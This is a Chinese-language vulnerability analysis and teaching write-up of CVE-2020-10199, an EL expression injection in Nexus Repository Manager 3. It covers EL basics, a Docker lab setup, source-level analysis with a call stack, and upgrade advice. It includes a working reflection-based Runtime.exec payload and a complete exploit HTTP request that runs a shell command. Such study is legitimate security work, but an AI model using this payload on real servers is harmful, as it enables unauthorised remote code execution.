Nexus3 EL表达式注入漏洞分析(CVE-2020-10199)教学文档<\/h1>

漏洞概述<\/h2>
Nexus Repository Manager 3是一款通用的软件包仓库管理服务。该漏洞存在于\/service\/rest\/beta\/repositories\/go\/group接口，攻击者可以通过发送精心构造的恶意JSON数据，在渲染数据时造成EL表达式注入，进而远程执行任意命令。<\/p>
影响版本<\/strong>：Nexus Repository Manager OSS\/Pro 3.x - 3.21.1
修复版本<\/strong>：Nexus Repository Manager OSS\/Pro 3.21.2
风险等级<\/strong>：严重(9.1)
所需权限<\/strong>：低\/高权限账号均可利用<\/p>

EL表达式基础知识<\/h2>
EL表达式简介<\/h3>
EL(Expression Language)全名为表达式语言，主要用于：<\/p>

替换JSP页面中的脚本表达式<%= %><\/code><\/li>
从各种类型的Web域中检索Java对象、获取数据<\/li>
访问JavaBean属性、数组、List集合和Map集合等<\/li> <\/ol> EL主要功能<\/h3> 获取数据<\/strong>：${标识符}<\/code><\/p> 从page、request、session、application四个域中查找对象<\/li> 示例：${name}<\/code>等同于pageContext.findAttribute("name")<\/code><\/li> <\/ul> <\/li> 执行运算<\/strong>：<\/p> 关系运算、逻辑运算和算术运算<\/li> 示例：${2+2}<\/code>、${user!=null?user.name:""}<\/code><\/li> <\/ul> <\/li> 获取web对象<\/strong>：<\/p> 11个隐含对象：pageContext<\/code>、pageScope<\/code>、requestScope<\/code>等<\/li> 示例：${param.name}<\/code>获取请求参数<\/li> <\/ul> <\/li> 调用Java方法<\/strong>：<\/p> 语法：${prefix:method(params)}<\/code><\/li> 需要自定义函数开发<\/li> <\/ul> <\/li> <\/ol> EL表达式RCE原理<\/h3> EL表达式若可控，可以通过反射机制执行任意命令：<\/p> ${<\/span>'<\/span>rai4over'<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>'<\/span>java.<\/span>lang<\/span>.<\/span>Runtime<\/span>'<\/span>).<\/span>getMethods<\/span>()[<\/span>6<\/span>].<\/span>invoke<\/span>(<\/span>null<\/span>).<\/span>exec<\/span>(<\/span>'<\/span>touch \/<\/span>tmp\/<\/span>shell'<\/span>)}<\/span> <\/span><\/span><\/code><\/pre>漏洞环境搭建<\/h2> 拉取包含漏洞的nexus3镜像：<\/li> <\/ol> docker pull sonatype\/nexus3:3.21.1 <\/span><\/span><\/code><\/pre> 运行docker容器：<\/li> <\/ol> docker run -d --rm -p 8081:8081 -p 5050:5050 --name nexus -v \/Users\/rai4over\/Desktop\/nexus-data:\/nexus-data -e INSTALL4J_ADD_VM_PARAMS=<\/span>"-Xms2g -Xmx2g -XX:MaxDirectMemorySize=3g -Djava.util.prefs.userRoot=\/nexus-data -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050"<\/span> sonatype\/nexus3:3.21.1 <\/span><\/span><\/code><\/pre> 下载Nexus源码并切换到对应分支：<\/li> <\/ol> git clone https:\/\/github.com\/sonatype\/nexus-public.git <\/span><\/span>git checkout -b release-3.21.0-05 origin\/release-3.21.0-05 <\/span><\/span><\/code><\/pre> 配置IDEA远程调试，在org.sonatype.nexus.bootstrap.osgi.DelegatingFilter#doFilter<\/code>设置断点<\/li> <\/ol> 漏洞复现<\/h2> 获取低权限账户的Cookie中的NX-ANTI-CSRF-TOKEN<\/code>和NXSESSIONID<\/code><\/p> <\/li> 发送恶意请求：<\/p> <\/li> <\/ol> POST \/service\/rest\/beta\/repositories\/go\/group HTTP\/1.1 Host: test.com:8081 Content-Length: 293 X-Requested-With: XMLHttpRequest X-Nexus-UI: true User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/85.0.4183.102 Safari\/537.36 NX-ANTI-CSRF-TOKEN: 0.289429876219083 Content-Type: application\/json Accept: *\/* Origin: http:\/\/test.com:8081 Referer: http:\/\/test.com:8081\/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: NX-ANTI-CSRF-TOKEN=0.289429876219083; NXSESSIONID=7e3ad549-6fcb-4952-9ace-29f71614bc28 Connection: close { "name": "internal", "online": true, "storage": { "blobStoreName": "default", "strictContentTypeValidation": true }, "group": { "memberNames": [ "${'rai4over'.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch \/tmp\/shell')}" ] } } <\/code><\/pre> 命令执行结果：在\/tmp目录下创建shell文件<\/li> <\/ol> 漏洞分析<\/h2> 请求处理流程<\/h3> 请求路径\/service\/rest\/beta\/repositories\/go\/group<\/code>由GolangGroupRepositoriesApiResource<\/code>类处理<\/p> <\/li> 根据@POST<\/code>注解调用createRepository<\/code>方法：<\/p> <\/li> <\/ol> org.<\/span>sonatype<\/span>.<\/span>nexus<\/span>.<\/span>repository<\/span>.<\/span>golang<\/span>.<\/span>rest<\/span>.<\/span>GolangGroupRepositoriesApiResource<\/span>#<\/span>createRepository <\/span><\/span><\/code><\/pre> 调用父类方法：<\/li> <\/ol> org.<\/span>sonatype<\/span>.<\/span>nexus<\/span>.<\/span>repository<\/span>.<\/span>rest<\/span>.<\/span>api<\/span>.<\/span>AbstractGroupRepositoriesApiResource<\/span>#<\/span>createRepository <\/span><\/span><\/code><\/pre> 关键验证方法：<\/li> <\/ol> org.<\/span>sonatype<\/span>.<\/span>nexus<\/span>.<\/span>repository<\/span>.<\/span>rest<\/span>.<\/span>api<\/span>.<\/span>AbstractGroupRepositoriesApiResource<\/span>#<\/span>validateGroupMembers <\/span><\/span><\/code><\/pre>漏洞触发过程<\/h3> 从请求中提取memberNames<\/code>数组，包含恶意EL表达式<\/p> <\/li> 当repositoryManager.get(repositoryName)<\/code>返回NULL时，进入else分支：<\/p> <\/li> <\/ol> constraintViolationFactory.<\/span>createViolation<\/span> <\/span><\/span><\/code><\/pre> 创建HelperBean<\/code>对象，将恶意EL表达式作为参数：<\/li> <\/ol> org.<\/span>sonatype<\/span>.<\/span>nexus<\/span>.<\/span>validation<\/span>.<\/span>ConstraintViolationFactory<\/span>.<\/span>HelperBean<\/span>#<\/span>HelperBean <\/span><\/span><\/code><\/pre> 调用validate<\/code>方法进行校验，最终触发EL表达式解析：<\/li> <\/ol> org.<\/span>hibernate<\/span>.<\/span>validator<\/span>.<\/span>internal<\/span>.<\/span>engine<\/span>.<\/span>messageinterpolation<\/span>.<\/span>ElTermResolver<\/span>#<\/span>interpolate <\/span><\/span><\/code><\/pre>关键调用栈<\/h3> interpolate:67, ElTermResolver interpolate:64, InterpolationTerm interpolate:112, ResourceBundleMessageInterpolator interpolateExpression:451, AbstractMessageInterpolator interpolateMessage:347, AbstractMessageInterpolator interpolate:286, AbstractMessageInterpolator interpolate:313, AbstractValidationContext addConstraintFailure:230, AbstractValidationContext validateConstraints:79, ConstraintTree doValidateConstraint:130, MetaConstraint validateConstraint:123, MetaConstraint validateMetaConstraint:555, ValidatorImpl validateConstraintsForSingleDefaultGroupElement:518, ValidatorImpl validateConstraintsForDefaultGroup:488, ValidatorImpl validateConstraintsForCurrentGroup:450, ValidatorImpl validateInContext:400, ValidatorImpl validate:172, ValidatorImpl createViolation:64, ConstraintViolationFactory validateGroupMembers:96, AbstractGroupRepositoriesApiResource createRepository:66, AbstractGroupRepositoriesApiResource createRepository:83, GolangGroupRepositoriesApiResource <\/code><\/pre> 修复建议<\/h2> 升级到Nexus Repository Manager OSS\/Pro 3.21.2或更高版本<\/p> <\/li> 对用户输入进行严格的过滤和验证，特别是EL表达式相关字符<\/p> <\/li> 限制低权限用户的访问权限<\/p> <\/li> <\/ol> 参考链接<\/h2> Sonatype官方公告<\/a><\/li> <\/ul>